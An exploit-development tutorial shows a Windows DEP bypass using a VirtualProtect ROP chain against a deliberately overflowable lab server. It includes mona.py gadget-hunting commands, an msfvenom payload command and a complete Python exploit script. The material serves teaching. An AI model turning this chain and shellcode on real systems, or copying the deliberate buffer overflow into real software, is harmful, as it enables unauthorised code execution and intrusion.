The first three tutorials in this series exploited binaries where the stack was executable. That era is over. Virtually every modern Windows binary ships with DEP (Data Execution Prevention) enabled, which marks the stack and heap as non-executable. Shellcode placed on the stack will trigger an access violation instead of running.
The bypass is the same idea as on Linux: return-oriented programming. Instead of executing injected code, you chain together short instruction sequences (“gadgets”) that already exist in executable memory, typically in loaded DLLs, to call a Windows API function that makes your shellcode’s memory region executable. Then you jump to it.
On Windows, the two most common targets are VirtualProtect (change page permissions on existing memory) and VirtualAlloc (allocate a new executable region and copy shellcode into it). This tutorial uses VirtualProtect because the shellcode is already on the stack; you just need to flip the page from PAGE_READWRITE to PAGE_EXECUTE_READWRITE.
Without DEP bypass:
Stack:
+--------+---------+------------+
| Junk   | JMP ESP | Shellcode  | → ACCESS VIOLATION (NX bit set)
+--------+---------+------------+
With ROP chain:
Stack:
+--------+-----------------------------+------------+
| Junk   | ROP chain → VirtualProtect  | Shellcode  | → VirtualProtect makes the stack
+--------+-----------------------------+------------+   executable, then shellcode runs
Lab setup
Use the same Windows environment from previous tutorials:
- Windows 11 (64-bit; the target runs as a 32-bit process under WoW64)
- Immunity Debugger with mona.py installed
- A vulnerable application compiled with DEP enabled and ASLR disabled
For a controlled target, compile a simple vulnerable server with DEP on and ASLR off:
// vuln_dep.c: compile with: cl /GS- vuln_dep.c /link /NXCOMPAT /DYNAMICBASE:NO ws2_32.lib
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
void handle_client(SOCKET client) {
    char buf[512];
    int len = recv(client, buf, 2048, 0); // deliberate overflow: up to 2048 bytes into 512
    printf("Received %d bytes\n", len);
}
int main() {
    WSADATA wsa;
    WSAStartup(MAKEWORD(2, 2), &wsa);
    SOCKET s = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = {0};
    addr.sin_family = AF_INET;
    addr.sin_port = htons(9999);
    addr.sin_addr.s_addr = INADDR_ANY;
    bind(s, (struct sockaddr *)&addr, sizeof(addr));
    listen(s, 5);
    printf("Listening on port 9999...\n");
    while (1) {
        SOCKET client = accept(s, NULL, NULL);
        handle_client(client);
        closesocket(client);
    }
}
The /NXCOMPAT flag enables DEP. /DYNAMICBASE:NO disables ASLR so we can focus on the DEP bypass without address randomization (that’s the next tutorial). /GS- turns off stack cookies so the overflow can reach the saved return address.
Note
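If you don’t have Visual Studio, use a 32-bit MinGW toolchain:
gcc -o vuln_dep.exe vuln_dep.c -lws2_32 -Wl,--nxcompat,--disable-dynamicbase
The --disable-dynamicbase option exists in recent binutils releases; older linkers leave ASLR off unless --dynamicbase is passed. Verify DEP is enabled by checking the PE header with dumpbin /headers vuln_dep.exe (look for "NX compatible" under DLL characteristics) or by inspecting the module in Immunity.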
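If dumpbin is not at hand, the same two header bits can be read directly. The following is a minimal sketch, not a full PE parser: `pe_mitigations` is a hypothetical helper name, and it assumes a well-formed image whose optional header is present. The flag values and offsets come from the PE/COFF format.

```python
import struct

# DllCharacteristics flag values from the PE/COFF format
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # image opts in to ASLR
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # image opts in to DEP


def pe_mitigations(image: bytes) -> dict:
    """Report the NX_COMPAT and DYNAMIC_BASE bits of a PE image (hypothetical helper)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    # e_lfanew, the file offset of the PE signature, is stored at 0x3C
    (pe_offset,) = struct.unpack_from("<I", image, 0x3C)
    if image[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    # 4-byte signature + 20-byte COFF header precede the optional header;
    # DllCharacteristics sits 70 bytes into it for both PE32 and PE32+
    (flags,) = struct.unpack_from("<H", image, pe_offset + 24 + 70)
    return {
        "dep": bool(flags & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "aslr": bool(flags & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
    }
```

Calling `pe_mitigations(open("vuln_dep.exe", "rb").read())` on the lab binary should report DEP on and ASLR off if the build flags took effect.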
Confirming DEP is active
Attach Immunity Debugger to the running process. Before building the exploit, verify DEP status:
!mona modules
Look at the DEP column in the output. You can also check at the process level:
Debug → Select process → check "DEP" column
Send an initial overflow to confirm the crash:
#!/usr/bin/env python3
import socket
payload = b"A" * 524 + b"BBBB" + b"\xcc" * 200 # INT3 sled after EIP
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))
s.sendall(payload)
s.close()
In Immunity, you’ll see EIP overwritten with 42424242. If you instead replace BBBB with a JMP ESP address and place shellcode after it, execution hits a DEP violation:
Access violation when executing [0019FA6C] (NX page fault)
DEP is working. The stack is not executable.
Understanding VirtualProtect
VirtualProtect is the Windows API function that changes memory page permissions. Its signature:
BOOL VirtualProtect(
    LPVOID lpAddress,      // Address of the region to change
    SIZE_T dwSize,         // Size of the region in bytes
    DWORD  flNewProtect,   // New protection flags (0x40 = PAGE_EXECUTE_READWRITE)
    PDWORD lpflOldProtect  // Pointer to receive the old protection value
);
To bypass DEP, the ROP chain needs to:
- Set up the four arguments to VirtualProtect on the stack or in registers
- Call VirtualProtect with lpAddress pointing to the shellcode, dwSize large enough to cover it, and flNewProtect = 0x40
- After VirtualProtect returns, redirect execution to the now-executable shellcode
The lpflOldProtect parameter requires a writable address; any writable location in the process works (a global variable, a .data section address). VirtualProtect writes the old protection value there.
ROP chain layout on the stack:
ESP → +------------------------------+
      | VirtualProtect address       | ← function to call
      +------------------------------+
      | Return address (→ shellcode) | ← where to go after VP returns
      +------------------------------+
      | lpAddress (ESP / shellcode)  | ← arg 1: memory to make executable
      +------------------------------+
      | dwSize (0x400)               | ← arg 2: size
      +------------------------------+
      | flNewProtect (0x40)          | ← arg 3: PAGE_EXECUTE_READWRITE
      +------------------------------+
      | lpflOldProtect (writable)    | ← arg 4: any writable address
      +------------------------------+
      | NOP sled + Shellcode         |
      +------------------------------+
Finding gadgets with mona
Configure mona’s working directory:
!mona config -set workingfolder C:\mona\%p
Locating VirtualProtect
!mona iat -s VirtualProtect
This searches the Import Address Table for VirtualProtect. The output shows the address of the IAT entry, which contains a pointer to the actual function.
0x12345678 kernel32.VirtualProtect (Module: vuln_dep.exe)
Finding a non-ASLR module for gadgets
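!mona modules
Look for modules with ASLR disabled (False in the ASLR column) and no bad characters in their base addresses. The vulnerable executable itself and any DLLs it loads without ASLR are candidates. On current Windows releases the system DLLs are all built with ASLR, so treat the MSVCRT.dll row and the 0x77c... addresses in this tutorial as illustrative and substitute a non-ASLR module from your own output.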
Module        Base        ASLR   DEP   SafeSEH
vuln_dep.exe  0x00400000  False  True  False
MSVCRT.dll    0x77C10000  False  True  False
Generating the ROP chain
Mona can automatically generate a ROP chain for common DEP bypasses:
!mona rop -m vuln_dep.exe,MSVCRT.dll -cpb "\x00\x0a\x0d"
This searches the specified modules for gadgets and attempts to construct a complete chain. The -cpb flag excludes pointers that contain bad characters. Mona writes the candidate chains to rop_chains.txt and the full gadget list to rop.txt.
!mona rop -m vuln_dep.exe,MSVCRT.dll -cpb "\x00\x0a\x0d" -n
The -n flag skips modules whose base address starts with a null byte, which here excludes vuln_dep.exe at 0x00400000.
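The bad-character filter that -cpb applies is easy to reproduce by hand when you are vetting a gadget address yourself. The sketch below assumes the bad-character set used in this tutorial; `has_bad_char` is a hypothetical helper, and the last two addresses in the list are made up purely to show a rejection.

```python
import struct

BAD_CHARS = b"\x00\x0a\x0d"  # same set passed to -cpb


def has_bad_char(address: int, bad: bytes = BAD_CHARS) -> bool:
    """True if the little-endian encoding of a 32-bit address contains a bad byte."""
    return any(byte in bad for byte in struct.pack("<I", address))


candidates = [
    0x77C31E24,  # POP EAX # RETN address from the example chain
    0x00401234,  # made-up address inside vuln_dep.exe: contains a null byte
    0x77C30A10,  # made-up address: contains 0x0a
]
usable = [hex(addr) for addr in candidates if not has_bad_char(addr)]
```

Only the first candidate survives, because the other two would be truncated or mangled on their way into the buffer.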
Review C:\mona\vuln_dep\rop_chains.txt. Mona produces Python-ready output:
# mona.py ROP chain for VirtualProtect (example output; addresses are illustrative)
def create_rop_chain():
    rop_gadgets = [
        # rop chain generated by mona.py
        0x77c31e24,  # POP EAX # RETN [MSVCRT.dll]
        0x77c11120,  # ptr to &VirtualProtect() [IAT MSVCRT.dll]
        0x77c31e70,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCRT.dll]
        0x77c12df9,  # XCHG EAX,ESI # RETN [MSVCRT.dll]; ESI = VirtualProtect
        0x77c31e24,  # POP EAX # RETN [MSVCRT.dll]
        0xfffffdff,  # Value to negate, will become 0x00000201 (513 bytes)
        0x77c353c3,  # NEG EAX # RETN [MSVCRT.dll]
        0x77c12df8,  # XCHG EAX,EBX # RETN [MSVCRT.dll]; EBX = dwSize
        0x77c31e24,  # POP EAX # RETN [MSVCRT.dll]
        0xffffffc0,  # Value to negate, becomes 0x00000040
        0x77c353c3,  # NEG EAX # RETN [MSVCRT.dll]; 0x40 = PAGE_EXECUTE_READWRITE
        0x77c12e01,  # XCHG EAX,EDX # RETN [MSVCRT.dll]; EDX = flNewProtect
        0xdeadbeef,  # PLACEHOLDER: POP EBP # RETN (take the address from your rop_chains.txt)
        0xdeadbeef,  # PLACEHOLDER: ptr to JMP ESP or PUSH ESP # RETN; EBP = VirtualProtect's return address
        0x77c34a10,  # POP ECX # RETN [MSVCRT.dll]
        0x77c5f030,  # &Writable location [MSVCRT.dll .data]; ECX = lpflOldProtect
        0x77c34a14,  # POP EDI # RETN [MSVCRT.dll]
        0x77c353c4,  # RETN (ROP NOP) [MSVCRT.dll]
        0x77c31e24,  # POP EAX # RETN [MSVCRT.dll]
        0x90909090,  # NOP
        0x77c12e08,  # PUSHAD # RETN [MSVCRT.dll]
        # PUSHAD pushes EAX, ECX, EDX, EBX, original ESP, EBP, ESI, EDI (EDI ends up on top).
        # This lays out the prepared values as a stdcall frame for VirtualProtect.
    ]
    return b''.join(p.to_bytes(4, 'little') for p in rop_gadgets)
How the chain works
The chain uses an indirect approach because placing the arguments directly on the stack would require null bytes, which would break the exploit. Instead:
- Load the VirtualProtect address: POP the IAT pointer into EAX, dereference it to get the actual function address, and move it into ESI
- Set dwSize: POP a negative value into EAX, negate it (avoids null bytes), and move it to EBX
- Set flNewProtect: same trick. POP the negative of 0x40, negate it, and move it to EDX
- Set the return address: EBP must hold a pointer to a JMP ESP (or PUSH ESP # RETN) gadget, loaded with a POP EBP # RETN gadget, because this is where VirtualProtect returns
- Set lpflOldProtect: POP a writable .data address into ECX
- PUSHAD: push all registers onto the stack in the order EAX, ECX, EDX, EBX, ESP (lpAddress!), EBP (return address), ESI (VirtualProtect), EDI (ROP NOP). This constructs the VirtualProtect call frame automatically
The PUSHAD trick is elegant: by loading specific values into specific registers and then pushing them all at once, the stack ends up with VirtualProtect’s arguments in exactly the right positions for the stdcall calling convention.
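To see why each register maps to the slot it does, it can help to model PUSHAD and the following returns on paper. The sketch below is a toy model, not an emulator: register contents are symbolic strings, the stack is a plain dict, and the starting ESP reuses the address from the access violation shown earlier. `pushad`, `retn`, and `simulate` are hypothetical helper names.

```python
def pushad(regs: dict, stack: dict) -> None:
    """Model x86 PUSHAD: push EAX, ECX, EDX, EBX, original ESP, EBP, ESI, EDI."""
    original_esp = regs["esp"]
    for name in ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"):
        regs["esp"] -= 4
        stack[regs["esp"]] = original_esp if name == "esp" else regs[name]


def retn(regs: dict, stack: dict, cleanup: int = 0):
    """Model RETN / RETN n: pop the target, then drop `cleanup` argument bytes."""
    target = stack[regs["esp"]]
    regs["esp"] += 4 + cleanup
    return target


def simulate(sled_address: int = 0x0019FA6C):
    # Register state just before PUSHAD; ESP points at the first byte after the chain
    regs = {
        "eax": 0x90909090, "ecx": "writable .data", "edx": 0x40, "ebx": 0x201,
        "esp": sled_address, "ebp": "JMP_ESP", "esi": "VirtualProtect", "edi": "ROP_NOP",
    }
    stack = {}
    pushad(regs, stack)
    first = retn(regs, stack)    # RETN after PUSHAD lands on EDI
    second = retn(regs, stack)   # the ROP NOP returns into ESI
    # On entry to VirtualProtect: [ESP] = return address, [ESP+4..] = four arguments
    args = [stack[regs["esp"] + 4 * i] for i in range(1, 5)]
    returns_to = retn(regs, stack, cleanup=16)  # stdcall: RETN 0x10
    return first, second, args, returns_to, regs["esp"], stack
```

Running `simulate()` shows the ROP NOP first, then VirtualProtect, with the original ESP as lpAddress, and a final ESP that sits on the EAX slot holding 0x90909090, four bytes below the NOP sled.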
After PUSHAD, the stack looks like:
ESP → +---------------------------+
      | EDI = RETN gadget         | ← ROP NOP: PUSHAD's RETN lands here, then returns into ESI
      +---------------------------+
      | ESI = &VirtualProtect     | ← entered via RETN
      +---------------------------+
      | EBP = ptr to JMP ESP      | ← return address: VirtualProtect returns here
      +---------------------------+
      | ESP = stack addr          | ← lpAddress (start of the NOP sled below)
      +---------------------------+
      | EBX = 0x201               | ← dwSize
      +---------------------------+
      | EDX = 0x40                | ← flNewProtect
      +---------------------------+
      | ECX = writable addr       | ← lpflOldProtect
      +---------------------------+
      | EAX = 0x90909090          | ← four NOPs; JMP ESP lands here
      +---------------------------+
      | NOP sled + shellcode      |
      +---------------------------+
Identifying bad characters
Follow the same process from previous tutorials:
!mona bytearray -b "\x00"
!mona compare -f C:\mona\vuln_dep\bytearray.bin -a <address>
For a network service, typical bad characters include:
\x00: null byte (string terminator)
\x0a: newline (protocol parsing)
\x0d: carriage return (protocol parsing)
The negation trick in the ROP chain avoids null bytes in arguments like 0x00000040 (flNewProtect): instead of placing the value directly, we POP 0xffffffc0 and negate it.
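The arithmetic behind the negation trick is plain 32-bit two's complement, so the constants can be checked offline. This is a small sketch under that assumption; `neg32` and `encode_for_neg` are hypothetical helper names.

```python
import struct


def neg32(value: int) -> int:
    """Two's-complement negation of a 32-bit value, as NEG EAX computes it."""
    return (-value) & 0xFFFFFFFF


def encode_for_neg(wanted: int) -> int:
    """Value to POP so that a following NEG EAX leaves `wanted` in EAX."""
    return neg32(wanted)  # negation is its own inverse modulo 2**32


def contains_null(value: int) -> bool:
    """True if the little-endian dword has a 0x00 byte."""
    return b"\x00" in struct.pack("<I", value)


fl_new_protect = encode_for_neg(0x40)   # 0xffffffc0
dw_size = encode_for_neg(0x201)         # 0xfffffdff
```

The raw constants 0x40 and 0x201 both contain null bytes once packed as dwords, while their negated forms do not, which is why the chain carries the latter.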
Complete exploit
Generate a real payload first and save it next to the exploit as shellcode.py:
msfvenom -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d" -f python -v shellcode > shellcode.py
#!/usr/bin/env python3
import socket
import struct
from shellcode import shellcode
pack = lambda x: struct.pack('<I', x)
# Bad chars: \x00\x0a\x0d
offset = 524 # bytes to EIP
# ROP chain: VirtualProtect via PUSHAD technique
# Addresses from mona output (adjust for your environment)
rop_chain = b""
rop_chain += pack(0x77c31e24) # POP EAX # RETN
rop_chain += pack(0x77c11120) # ptr to &VirtualProtect() [IAT]
rop_chain += pack(0x77c31e70) # MOV EAX,[EAX] # RETN; dereference IAT
rop_chain += pack(0x77c12df9) # XCHG EAX,ESI # RETN; ESI = VirtualProtect
rop_chain += pack(0x77c31e24) # POP EAX # RETN
rop_chain += pack(0xfffffdff) # -0x201 (will be negated to 0x201 = 513 bytes)
rop_chain += pack(0x77c353c3) # NEG EAX # RETN; EAX = 0x201
rop_chain += pack(0x77c12df8) # XCHG EAX,EBX # RETN; EBX = dwSize
rop_chain += pack(0x77c31e24) # POP EAX # RETN
rop_chain += pack(0xffffffc0) # -0x40 (will be negated to 0x40)
rop_chain += pack(0x77c353c3) # NEG EAX # RETN; EAX = 0x40
rop_chain += pack(0x77c12e01) # XCHG EAX,EDX # RETN; EDX = flNewProtect
rop_chain += pack(0xdeadbeef) # PLACEHOLDER: POP EBP # RETN (take the address from your rop_chains.txt)
rop_chain += pack(0xdeadbeef) # PLACEHOLDER: ptr to JMP ESP or PUSH ESP # RETN; EBP = return address after VirtualProtect
rop_chain += pack(0x77c34a10) # POP ECX # RETN
rop_chain += pack(0x77c5f030) # writable .data address; ECX = lpflOldProtect
rop_chain += pack(0x77c34a14) # POP EDI # RETN
rop_chain += pack(0x77c353c4) # RETN (ROP NOP); PUSHAD's RETN lands here and falls through to ESI
rop_chain += pack(0x77c31e24) # POP EAX # RETN
rop_chain += pack(0x90909090) # four NOPs; execution resumes here after VirtualProtect returns
rop_chain += pack(0x77c12e08) # PUSHAD # RETN; sets up VirtualProtect call frame
# NOP sled + shellcode
nop_sled = b"\x90" * 16
payload = b"A" * offset
payload += rop_chain
payload += nop_sled
payload += shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))
s.sendall(payload)
s.close()
Execution flow
1. Overflow buf[512] with up to 2048 bytes via recv()
2. EIP overwritten with first gadget address (POP EAX # RETN)
3. ROP chain executes:
   a. Load VirtualProtect address from IAT → ESI
   b. Set dwSize = 0x201 → EBX (via negate trick)
   c. Set flNewProtect = 0x40 → EDX (via negate trick)
   d. Set return address = ptr to JMP ESP → EBP
   e. Set lpflOldProtect = writable .data addr → ECX
   f. Set EDI = RETN (ROP NOP) and EAX = 0x90909090 (NOPs)
   g. PUSHAD constructs the call frame
4. PUSHAD's RETN lands on the ROP NOP (EDI), which returns into ESI → VirtualProtect executes
   - Changes stack page from RW to RWX
5. VirtualProtect returns to the JMP ESP gadget (EBP)
   - Which jumps into the NOPs on the (now executable) stack
6. Shellcode executes
Debugging the ROP chain
When the chain doesn’t work on the first try (it usually doesn’t), systematic debugging in Immunity is essential.
Setting breakpoints on gadgets
Set a breakpoint on the first gadget in your chain:
bp 0x77c31e24
Run the exploit. When it breaks, step through with F7 (step into) and verify each gadget does what you expect.
Watching register state
After each gadget executes, check that the target register holds the expected value. In the Registers window:
After POP EAX # RETN:  EAX should contain the IAT pointer
After MOV EAX,[EAX]:   EAX should contain &VirtualProtect
After XCHG EAX,ESI:    ESI should contain &VirtualProtect
...
Common failures
VirtualProtect returns 0 (failure). Check the arguments: lpAddress does not have to be page-aligned, but every page touched by the range from lpAddress to lpAddress + dwSize must be committed; dwSize must be > 0; and lpflOldProtect must point to a writable address. Use !mona find -s "\x00\x00\x00\x00" -x RW to find writable locations.
Chain crashes mid-execution. A gadget has a side effect you didn’t account for. Check if any gadget clobbers a register that a later gadget depends on. Step through each gadget and note all register changes, not just the intended one.
Shellcode still triggers DEP. VirtualProtect was called with the wrong lpAddress. The ESP value captured by PUSHAD might not point to your shellcode. Adjust the NOP sled size or add a stack adjustment gadget before the shellcode.
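When diagnosing the last two failures it helps to work out which pages a given lpAddress and dwSize actually touch, and whether the sled and shellcode fall inside that range. The sketch below assumes 4 KiB pages and reuses the stack address from the earlier access violation as an example; `affected_pages` and `covers` are hypothetical helper names.

```python
PAGE_SIZE = 0x1000  # 4 KiB pages on x86


def affected_pages(lp_address: int, dw_size: int) -> list:
    """Base addresses of every page containing a byte of [lp_address, lp_address + dw_size)."""
    if dw_size <= 0:
        raise ValueError("dwSize must be greater than zero")
    first = lp_address & ~(PAGE_SIZE - 1)
    last = (lp_address + dw_size - 1) & ~(PAGE_SIZE - 1)
    return list(range(first, last + PAGE_SIZE, PAGE_SIZE))


def covers(lp_address: int, dw_size: int, start: int, length: int) -> bool:
    """True if [start, start + length) lies on pages that the call re-protects."""
    pages = affected_pages(lp_address, dw_size)
    region_first = start & ~(PAGE_SIZE - 1)
    region_last = (start + length - 1) & ~(PAGE_SIZE - 1)
    return region_first >= pages[0] and region_last <= pages[-1]
```

For example, `affected_pages(0x0019FA6C, 0x201)` yields the single page at 0x0019F000, so a 16-byte sled plus roughly 220 bytes of shellcode starting at 0x0019FA6C is covered, whereas the same payload starting near the end of the page would spill onto a page the call never touched.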
VirtualAlloc alternative
If VirtualProtect isn’t available or practical, VirtualAlloc allocates a new executable memory region:
LPVOID VirtualAlloc(
    LPVOID lpAddress,        // NULL (let the system choose)
    SIZE_T dwSize,           // Size of region
    DWORD  flAllocationType, // 0x1000 (MEM_COMMIT)
    DWORD  flProtect         // 0x40 (PAGE_EXECUTE_READWRITE)
);
The chain is slightly more complex because you need to copy shellcode from the stack into the newly allocated region. The typical approach:
- Call VirtualAlloc to get an RWX region
- Use a memcpy gadget or a series of MOV [reg], reg gadgets to copy shellcode
- Jump to the allocated region
Mona can generate this variant too. The same rop command writes a VirtualAlloc chain to rop_chains.txt alongside the VirtualProtect one whenever it finds the required gadgets. Adding -rva only switches the output to module-relative addresses:
!mona rop -m vuln_dep.exe,MSVCRT.dll -cpb "\x00\x0a\x0d" -rva
WriteProcessMemory alternative
A third option is WriteProcessMemory, which copies data into a process's address space. It temporarily makes the destination pages writable if it has to, so the destination can be the .text section of a loaded module (which is executable by default):
BOOL WriteProcessMemory(
    HANDLE  hProcess,                // -1 (current process, pseudo-handle)
    LPVOID  lpBaseAddress,           // destination in executable memory
    LPCVOID lpBuffer,                // source (shellcode on stack)
    SIZE_T  nSize,                   // size of shellcode
    SIZE_T  *lpNumberOfBytesWritten  // output parameter
);
This avoids changing page permissions entirely; you write shellcode over existing executable code.
Tips and troubleshooting
Gadget alignment
On Windows x86, the stdcall convention expects the callee to clean up the stack. If your ROP chain doesn’t account for this, the stack will be misaligned after the API call returns. The PUSHAD technique handles this automatically, but manual chains need careful stack management.
DEP opt-in vs opt-out
Windows DEP has two modes:
- OptIn: protects only Windows system components and processes that explicitly request it, for example binaries linked with /NXCOMPAT (default on client Windows)
- OptOut: protects all processes except those explicitly excluded (default on Server)
Check the system policy: bcdedit /enum | findstr nx. For testing, set OptOut (bcdedit /set nx OptOut from an elevated prompt, then reboot) to ensure DEP is active for your target.
Permanent DEP via SetProcessDEPPolicy
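Some applications call SetProcessDEPPolicy(PROCESS_DEP_ENABLE | PROCESS_DEP_DISABLE_ATI_THUNK_EMULATION) to enable permanent DEP. Permanent DEP means the process can no longer switch DEP off at runtime, which defeats older bypasses that called SetProcessDEPPolicy or NtSetInformationProcess to disable it. It does not stop VirtualProtect from marking a page executable, so the chain in this tutorial still applies; VirtualAlloc and WriteProcessMemory remain available as alternatives.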
ROP chain size
The ROP chain for VirtualProtect with the PUSHAD technique is typically 76-100 bytes. Add the NOP sled and shellcode (~220 bytes for the encoded windows/exec payload used here; a reverse shell is larger), and you need about 400 bytes of controllable stack space after EIP. If space is limited, consider a two-stage approach: use a minimal ROP chain to call VirtualProtect on a larger buffer elsewhere in memory where you’ve placed the full shellcode (similar to the egghunter concept from the previous tutorial).
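The space estimate is simple arithmetic, and a few lines make it easy to redo when the chain or payload changes. The sketch below uses this tutorial's figures (offset 524, a 16-byte sled, the 2048-byte recv() limit) together with an assumed 20-dword chain and a 220-byte payload; `payload_budget` is a hypothetical helper name.

```python
def payload_budget(offset: int, gadget_count: int, sled_len: int,
                   shellcode_len: int, recv_limit: int = 2048) -> dict:
    """Rough size budget for a chain of 4-byte entries followed by a sled and shellcode."""
    chain_len = gadget_count * 4                 # each chain entry is one dword
    after_eip = chain_len + sled_len + shellcode_len
    total = offset + after_eip
    return {
        "chain_len": chain_len,
        "after_eip": after_eip,
        "total": total,
        "fits": total <= recv_limit,             # must fit in a single recv() call
    }


budget = payload_budget(offset=524, gadget_count=20, sled_len=16, shellcode_len=220)
```

With these assumed numbers the chain is 80 bytes, 316 bytes follow the saved return address, and the whole payload stays well under the 2048 bytes the server reads.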